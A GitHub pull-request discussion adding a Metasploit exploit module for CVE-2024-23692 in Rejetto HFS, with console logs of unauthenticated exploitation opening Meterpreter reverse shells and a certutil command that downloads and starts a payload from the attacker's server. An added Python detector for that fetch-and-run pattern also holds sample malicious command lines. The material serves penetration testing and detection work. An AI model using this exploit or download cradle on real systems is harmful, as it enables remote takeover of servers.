Rejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692) #19240

Merged: bwatters-r7 merged 3 commits into rapid7:master from sfewer-r7:CVE-2024-23692 on Jun 11, 2024
@sfewer-r7
Contributor

This pull request adds an exploit module for CVE-2024-23692, an unauth SSTI in the Rejetto HTTP File Server (HFS).

Original finder has a blog post here, along with a redacted PoC: https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/

I wrote a short AKB assessment here: https://attackerkb.com/assessments/f5c5359d-2446-4e33-a1a2-6a66aa2fb5f6

Tested against versions:

  • 2.4.0 RC7
  • 2.3m

Example usage:

msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.86.35
RHOSTS => 192.168.86.35
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RPORT 80
RPORT => 80
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
[+] 192.168.86.35:80- The target is vulnerable. Rejetto HFS version 2.4.0 RC7
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC7
[*] Sending stage (201798 bytes) to 192.168.86.35
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.35:32057) at 2024-06-06 18:03:13 +0100

meterpreter > getuid
Server username: testing-vm\user
meterpreter >

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 7, 2024
@bwatters-r7
Contributor

@msjenkins-r7 test this please

@bwatters-r7
Contributor

Not sure why Linux sanity tests are failing. It appears not to have retested from my earlier comment.

@bwatters-r7
Contributor

@msjenkins-r7 retest this please

@bwatters-r7
Contributor

Windows 10x64 22H2


Module options (exploit/windows/http/rejetto_hfs_rce_cve_2024_23692):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                   yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      AWawqlsR         no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set rhost 10.5.132.118
rhost => 10.5.132.118
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set verbose true
verbose => true
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
[+] 10.5.132.118:80 - The target is vulnerable. Rejetto HFS version 2.4.0 RC6
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > run

[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w %TEMP%\aiRwNUsNR.exe & start /B %TEMP%\aiRwNUsNR.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC6
[*] Client 10.5.132.118 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.118 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.118 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.118 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 10.5.132.118
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.118:49594) at 2024-06-11 09:58:30 -0500

meterpreter > sysinfo
Computer        : DESKTOP-V413087
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-V413087\msfconsole
meterpreter > 
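
For defenders, the fetch-and-run command line and the two fetch-handler user agents in the test output above are the observable artifacts of this payload delivery. The following Python is an added example, not part of the pull request or the Metasploit module; the function names, sample command lines, IP addresses and file names are constructed for illustration, and arguments are assumed to be unquoted.

```python
import re
from collections import defaultdict

CHAIN = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")  # cmd.exe command separators

def certutil_fetch(cmdline):
    """Return url/dest/executed for a 'certutil -urlcache -f <url> <dest>' download,
    else None. Arguments are assumed unquoted, as in the output above."""
    parts = [p for p in CHAIN.split(cmdline.strip()) if p.strip()]
    for i, part in enumerate(parts):
        tokens = part.split()
        names = [t.lower().rsplit("\\", 1)[-1] for t in tokens]
        idx = next((j for j, n in enumerate(names) if n in ("certutil", "certutil.exe")), None)
        if idx is None:
            continue
        tail = tokens[idx + 1:]
        flags = {t[1:].lower() for t in tail if t[0] in "-/"}
        args = [t for t in tail if t[0] not in "-/"]
        urls = [a for a in args if re.match(r"https?://", a, re.I)]
        if not {"urlcache", "f"} <= flags or not urls:
            continue
        rest = args[args.index(urls[0]) + 1:]
        dest = rest[0] if rest else None
        # Download followed by a later chained command that names the same file
        executed = bool(dest) and any(dest.lower() in p.lower() for p in parts[i + 1:])
        return {"url": urls[0], "dest": dest, "executed": executed}
    return None

def certutil_http_clients(requests):
    """Return sorted (client, path) pairs requested with both user agents seen above."""
    seen = defaultdict(set)
    for client, path, ua in requests:
        if ua.startswith("Microsoft-CryptoAPI/"):
            seen[(client, path)].add("cryptoapi")
        elif ua == "CertUtil URL Agent":
            seen[(client, path)].add("certutil")
    return sorted(key for key, kinds in seen.items() if len(kinds) == 2)

# Constructed samples (documentation IP ranges, made-up file names)
SAMPLE_CMDLINES = [
    r"cmd.exe /c certutil -urlcache -f http://198.51.100.7:8080/AbCdEf %TEMP%\upd.exe & start /B %TEMP%\upd.exe",
    r"certutil.exe -hashfile C:\Users\user\file.iso SHA256",
    r"C:\Windows\System32\certutil.exe -urlcache -f https://example.test/root.crl C:\pki\root.crl",
]
SAMPLE_REQUESTS = [
    ("192.0.2.10", "/AbCdEf", "Microsoft-CryptoAPI/10.0"),
    ("192.0.2.10", "/AbCdEf", "CertUtil URL Agent"),
    ("192.0.2.11", "/crl/root.crl", "Microsoft-CryptoAPI/10.0"),
]
```

The `executed` field separates a download that is immediately run from a plain download, and the user-agent pairing is needed because `Microsoft-CryptoAPI` on its own also appears in the third constructed request, which is not flagged.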

@bwatters-r7
Contributor

@sfewer-r7 I'll get this landed once the minor doc suggestions are finished.

sfewer-r7 and others added 2 commits June 11, 2024 16:23
…_2024_23692.md


fix a typo in the documentation.

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>

improve documentation guidance to mention upgrading to a newer supported version (as 2.x is no longer supported)

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>

@sfewer-r7
Contributor Author

Thanks @bwatters-r7, I have committed those 2 documentation changes so we should be good here :)

@bwatters-r7 bwatters-r7 merged commit f202778 into rapid7:master Jun 11, 2024
@bwatters-r7
Contributor

Release Notes

Adds an exploit module for CVE-2024-23692, an unauthorized SSTI in the Rejetto HTTP File Server (HFS).

@cyclestudy

Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.3m
[*] Exploit completed, but no session was created.
